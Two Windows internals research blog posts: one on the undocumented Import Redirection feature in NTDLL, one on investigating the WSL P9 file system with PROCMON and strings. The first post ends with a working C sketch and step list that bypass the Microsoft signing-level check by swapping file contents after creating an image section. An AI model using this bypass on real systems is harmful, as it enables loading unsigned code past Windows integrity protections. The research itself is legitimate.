While poking around in NTDLL the other day for some Chrome work I noticed an interesting-sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing it on 1909.

What piqued my interest was that during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess; it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value; the obvious candidate is CreateProcessInternalW in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }

    PRTL_USER_PROCESS_PARAMETERS Params;
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }

    // ...
}

The value of RedirectionDllName is being retrieved from BasepAppXExtension, which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely the feature was designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema; therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the schema type is ST_DllFile, which defines the allowed path component for a package-relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation; at least on MSDN I couldn’t seem to find any further reference to it, so maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I knew how to implement it inside my own DLL. I need to define a list of REDIRECTION_FUNCTION_DESCRIPTOR structures which specify which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure named __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive-aggressive statement):

#include <windows.h>
#include <stdio.h>
// The REDIRECTION_* structures aren't in the public headers; define them
// as per the SO answer.

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW",
                  &CreateProcessWForwarder },
};

extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions
};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and the like. There are some limitations: it doesn’t always redirect imports you’d think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your application’s dependency graph and doesn’t support GetProcAddress. But you could probably live with that.

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was, when I did, process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made on the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead, I got STATUS_PROCEDURE_NOT_FOUND, which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed, binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.
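
For example, something like the following would work (a sketch; the DLL names and the decision logic are made up for illustration):

#include <windows.h>
#include <wchar.h>

// Hypothetical usage of the extra exports: skip redirection entirely for
// one DLL, and skip only the first table entry for another.
extern "C" __declspec(dllexport) BOOL __ShouldApplyRedirection__(LPWSTR DllName)
{
    return _wcsicmp(DllName, L"example-skip-me.dll") != 0;
}

extern "C" __declspec(dllexport) BOOL __ShouldApplyRedirectionToFunction__(
    LPWSTR DllName, DWORD Index)
{
    return !(_wcsicmp(DllName, L"example-other.dll") == 0 && Index == 0);
}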

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess, and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is a Packaged Process, through a check on the PEB. This is why the load works in a Packaged Application: the check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

The code is using the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to get the kernel's Code Integrity module to check the signing level. The signing level must be at least level 8, passed in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know: a Microsoft signed DLL loads but a non-Microsoft signed one doesn't, as it wouldn't be assigned the Microsoft signing level.

The cached signature checks have had multiple flaws before now; for example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft-only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see the section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows, with a rough code sketch after the list:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?
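
A minimal sketch of steps 1 to 5 using Win32 APIs (my illustration, error handling omitted):

#include <windows.h>

// Create an image section for the unsigned DLL, then replace the on-disk
// file with a Microsoft signed DLL. The signing check reads the file, but
// the loader reuses the cached (unsigned) image section.
void PrepareRedirectionDll(LPCWSTR TempPath, LPVOID SignedDll, DWORD SignedDllSize) {
    HANDLE file = CreateFileW(TempPath,
        GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE,
        FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    HANDLE section = CreateFileMappingW(file, NULL,
        PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    LPVOID base = MapViewOfFile(section, FILE_MAP_READ, 0, 0, 0);
    // Rewrite the file with the signed DLL's contents through the handle
    // we opened before the section existed.
    SetFilePointer(file, 0, NULL, FILE_BEGIN);
    DWORD written;
    WriteFile(file, SignedDll, SignedDllSize, &written, NULL);
    SetEndOfFile(file);
    // Close the file and section handles but deliberately keep the view
    // mapped so the cached image section stays alive (step 5).
    CloseHandle(section);
    CloseHandle(file);
    (void)base;
}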

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Digging into the WSL P9 File System

Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added that I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis, I thought I'd provide an overview of the process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time such as adding support to start Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained: accessing Linux files from Windows applications. You could do it; the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state, which in the worst case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog post introduced the new feature: accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there are any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to set up an x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success at setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI; instead you need to use the Set-VMComPort PowerShell cmdlet.
  • Installed my tooling, such as NtObjectManager and the SysInternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Installed a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to log in to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple: that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets, could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but sometimes there are more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is, as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used, as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or only in Explorer. This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether it's a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call also eliminates the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be that the mini-redirector is implemented in the LXCORE system driver, which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool shows the driver doesn't import anything from RDBSS, which would be crucial for the implementation of a mini-redirector.

To find the actual driver name I'll go for the simplest, brute force approach: just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well, FINDSTR) for RDBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case-insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate, P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this.

We could throw the driver into a disassembler at this point and start to RE, but I don't want to go there just yet. Instead, in the spirit of laziness, I'll throw the driver into STRINGS and get out all the printable debug string information, of which there's likely to be some. I typically use the SysInternals STRINGS rather than the BINUTILS one, just because I usually have it installed on any test system and it handles Unicode and ANSI strings with no additional arguments. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here. Firstly we can see the WSL$ prefix, a good indication that we're in the right place. Second, we can see a device name which suggests there's expected to be communication from user mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX", which ties in nicely with our expectation that Unix sockets are being used.

One thing which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that the driver communicates with the socket through a file (I don't even know if Windows supports the "abstract" socket names), and if it is indeed using a file it's not a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, which in turn should be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver, which cannot be detected by PROCMON as it never receives the request. However we'll assume that it can be detected; of course if we don't find it we might have to resort to disassembly or kernel debugging after all.

The second assumption is based on the fact that the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be opened in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false, as it might mean we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's a useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, so instead we'll do something else. First gather a trace of a PowerShell session where you execute the Get-NtFile command shown earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols; however, as we're only interested in the module on the stack, not the symbol names, we can select to include the stack trace but not symbol resolving. With an exported trace we can now filter the calls using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple: if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select the Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check let's open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest. At the top there are the calls through the AFUNIX driver, which demonstrates that the file is being opened due to a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also, now we know the path we can put it back into PROCMON as a filter, and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is done entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How are the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, and if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers?
  • Does this file system have any other interesting behaviors?
Some of those things will have to wait for another blog post.








